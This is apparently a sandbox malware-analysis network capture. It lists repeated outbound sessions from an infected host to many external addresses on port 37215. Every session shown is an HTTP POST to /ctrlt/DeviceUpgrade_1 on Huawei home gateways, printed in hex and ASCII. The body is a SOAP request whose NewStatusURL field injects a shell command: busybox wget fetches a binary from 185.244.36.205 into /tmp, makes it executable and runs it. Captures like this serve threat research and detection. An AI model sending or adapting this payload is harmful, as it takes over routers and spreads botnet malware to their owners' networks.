                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1227192.168.2.154507464.63.171.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396569967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1228192.168.2.1539018122.36.119.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396583080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1229192.168.2.156018445.255.124.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396591902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1230192.168.2.155169437.36.94.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396610022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1231192.168.2.1548518197.24.164.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396627903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1232192.168.2.1533638181.236.65.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396656036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1233192.168.2.155595031.110.92.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396677017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1234192.168.2.153691664.83.86.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396678925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1235192.168.2.154072631.214.227.17537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396687984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1236192.168.2.1546194186.247.39.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396718025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
